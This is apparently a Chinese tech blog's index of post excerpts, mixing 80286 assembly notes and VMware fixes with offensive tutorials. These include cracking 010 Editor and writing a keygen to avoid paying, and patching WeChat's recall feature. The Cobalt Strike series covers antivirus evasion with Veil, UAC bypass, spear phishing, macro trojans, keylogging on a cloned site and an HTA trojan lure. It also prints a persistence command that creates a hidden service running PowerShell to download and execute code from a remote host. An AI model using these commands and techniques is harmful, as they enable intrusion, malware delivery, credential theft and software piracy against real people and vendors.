指令的格式及其操作尺寸
01. 80286的16位保护模式 80286的寄存器和8086有同样的寄存器 2. 80286的描述符有48位 {% asset_img 89ef06a022ca9dfcc82e9db73a4dbd5a.png 80286描述符格式 %} 3. 80286也引入了描述符, 描述符表, 描述符高速缓存器, 段选择子的概念 {% asset_img 50daf97b92479e82b0a8e32a76b16a03.png %} 4. 80286的地址线有24位可以寻址16M空间的任意地址, 但是只有16位偏移, 所以确定了段地址后只能在1M的空间内偏移 {% asset_img 8a96c9a8dc8774e1d9b3161716de41f8.png %} {% asset_img 7cafe51b7eda396fb20e58546a24b41f.png %} 02. 16位处理器的指令操作尺寸 1.指令的操作尺寸 2. ...
进入保护模式
保护模式是要保护什么 全局描述符表GDT和全局描述符表寄存器GDTR 保护模式下: 对内存的访问让然使用段地址和偏移地址, 但是, 在每个段能够访问之前, 必须先进性登记 超出范围的访问会产生一个内部异常的中断 和一个段有关的信息需要八个字节(64位)来描述, 称之为段描述符, 而在内存中存放这些描述符的地方就叫做描述符表 全局描述符表(GDT): 顾名思义是为整个计算机硬件系统服务的, 进入保护模式之前由系统定义 (GDTR): 描述符表寄存器(48位) 准备创建全局描述符表 寻址GDT起始地址的方法 从CS段主引导程序0x7c00+gdt_base获取到GDT的起始地址, 然后除以16分别讲余数和商放入dx和ax中(16位(除数) (dx高位和ax低位拼接)(被除数) ax(商) dx(余数)) ;计算GDT所在的逻辑段地址 mov ax,[cs:gdt_base+0x7c00] ;低16位 mov dx,[cs:gdt_base+0x7c00+0x02] ...
010EDIT破解&注册机
010edit是一款非常好用的二进制文本编辑器,但是这款软件不是免费的,so让我们来分析一下它的算法,写一下注册机。 环境:win7 32虚拟机,OD,IDA 分析目标 编写注册机 去除网络验证 开始分析0x00 今天我们分析的是9.0版本 0x01 开始分析,我们点击register按钮,弹出来窗口让我们输入用户名&密码 随便先输入了一组用户名和密码,弹出了提示窗口,接下来我们用OD打开010来查找这个字符串 双击找到字符串的位置,往上分析看是从什么地方跳过来的,通过下断点尝试我们找到了这个它做验证的位置 0x02 接下来我们对关键算法函数进行详细分析 在这里我们发现指令对我们输入的密码进行了一系列的操作验证 我们需要把对密码的验证操作逐条分析出来,便于写注册机时使用 通过对这一块的分析,我们得到了密码的验证规则,接下来我们写代码尝试验证看我们分析的是否正确 #include "stdafx.h" #include <Windows.h> #include<time.h> int main() { ...
VMware问题汇总
记录一下,VMware使用过程中出现的问题以及解决方法 恢复快照出错有时候在恢复快照的时候会出现找不到所需文件,无法恢复快照的问题 找到虚拟机的.vmx文件将第一个scsi0.present字段改为FALSE之后再恢复快照即可 安装vmtools按钮灰色无法安装vmtools将存储设置都改为自动检测即可,重新开机就可以重新安装vmtools了 如果ubuntu22.04安装的vmtools不起作用,试试安装open-vm-tools-desktop sudo apt-get install open-vm-tools-desktop 安装之后重启切换用户到xorg 有时候重启切换用户不生效,就注销用户重新切换一下
资本主义和社会主义
2021/6/8马克思认为资本主义发展方向,是资本占有的社会化,走向社会主义,从资本占有的角度来说就是社会资本主义。其中的关键是,资本占有的载体不是私人为主,而应该是公有制前提下的国家持有和社会占有。是社会化占比更高的国家-社会混合型经济。 社会资本主义的承载主体,可以是社会企业、合作社、集体所有的股份公司、全员持股公司等等。 这个意义上,国有企业、社会企业、集体经济都是属于社会资本的范畴。 国有企业如果被变相搞私有化,就是假的社会资本。
微信防撤回
目标阻止PC版微信消息撤回 分析 再微信程序文件夹搜索关键字:撤回是revoke撤回消息我们搜索revokemsg关键字 通过搜索关键字确定消息撤回的功能大概率在这个dll文件里 开始用x32Dbg加载微信分析这个dll 2.1. 找到这个dll之后,在这个dll里面搜索字符串revokemsg 2.2. 找到第一个revokemsg字符串 2.3. 双击点进去到反汇编可以看到上面有一个条件跳转,将跳转改为无条件跳转jmp 2.4. 右键补丁保存即可
Cobalt-Strike-十-可持续后门的使用
服务自启动 先创建一个与目标机的连接并提升权限 再使用以下命令来创建自启动服务有两种方式 2.1. 一种是从远程通过web下载shell来执行自启动服务 shell sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.3.58:81/a'))\"" shell sc config "Windows Power" start= auto shell sc description "Windows Power" "windows auto service" shell net start "Windows Power" // 启动服务 shell sc delete "Windows Power" // 删除服务 2.2. 通过执行本地的后门程序来启动 shell sc create "server power" binpath=...
Cobalt-Strike-九 免杀(一)
Veil免杀安装网上有很多的安装方法:安装很简单输入命令sudo apt install veil然后一直确定下一步就可以了,安装时间较长 安装方法 安装的过程中先使用CS生成一个payload 使用安装完成后输入veil可以启动veil工具 安装完成可以看到有 Evasion和Ordnace 两个工具:Evasion是用来做==文件免杀==的一般来说选用的比较多 输入use 1选用Evasion list查看可用的payloads 输入use 17这里我们选择一个go 的注入payload 输入generate选择生成payload 输入3选择自定义类型字符串,然后将我们前面生成的payload放进去回车执行 然后再给输入个名字:不需要输入后缀名 将生成后的文件拷贝出来拿到vt上查杀一下 被一大半的杀软检测出来了(安装了360和火绒也过不去,会直接被检测出来) HanzoInjection 方法HanzoIjection 是一种工具,专注于在内存中注入任意代码以绕过常见的防病毒解决方案 下载链接 Arguments...
Cobalt-Strike-八 提权
提权顾名思义简单来说就是将普通用户的权限提升至管理员权限 Bypass UAC什么是UAC用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。 使用提权点击选择Elevate 这里有两种默认自带的两种提权方式:直接选择使用,试过之后在win7上都可以成功提权 powerup提权下载powershell脚本 https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc 命令上传脚本 powershell-import 执行上传的脚本 powershell invoke-allchecks 未完待续
Cobalt-Strike-七 Cobalt Strike鱼叉钓鱼
鱼叉钓鱼鱼叉式网络钓鱼(Spear phishing)指一种源于亚洲与东欧只针对特定目标进行攻击的网络钓鱼攻击。 鱼叉式网络钓鱼攻击针对特定组织内的特定目标个体。电子威胁 形势已发生了极大变化,从大量的垃圾邮件转向具有针对性的电 子邮件网络钓鱼活动,后者可对全球组织造成重大的财务、品牌和 运营损失。 例如,攻击者更加关注 高管和其他具有管理员权限的雇员,诱使其启动恶意软件,让犯罪 分子进入公司环境。这可能是勒索软件,先加密公司数据,然后借 机向受害者勒索费用。 邮箱钓鱼模块使用 cobalt strike提供了一个邮箱钓鱼模块 我们来看一下这个模块怎么使用 targets:创建一个新的文件 填写的内容记得邮箱和名字之间用tab隔开 template:找一个新的邮件点击显示邮件原文 将内容全部拷贝下来 粘贴进文件中 填入文件路径 Attachment:这个可以用来上传附件,暂时先不用这个Embed URL:这里填入想跳转到的网址例如填写163邮箱的登陆页面 https://mail.163.com/ 填写发送邮箱的信息 Bounce...
Cobalt-Strike-六
Cobalt Strike进行钓鱼攻击一. 生成后门 以宏病毒为例 宏病毒:点击选项卡生成office宏病毒,并选择一个合适的监听器,然后可以看到弹出下图的提示卡片 按照卡片提示,新建word文档,点击查看宏 2.1. 创建宏 2.2. 用CS生成的宏木马替换原有的宏代码 2.3. 保存创建的word文档 打卡word就能够看到已经上线 二. 钓鱼模块 web管理模块:可以看到我们生成的所有web模块 克隆网站:对克隆网站进行键盘记录 2.1. 在web log窗口可以看到我们在网页输入的内容 克隆网站:执行下载木马 3.1 先来生成一个hta文件 3.2. 然后将生成的hta文件托管到cs:修改一下Local URL的文件名 3.3. 会生成一个url http://192.168.3.8:80/update.hta 3.4. 选择克隆网站功能:填写要克隆的网站和用来下载的木马 3.5....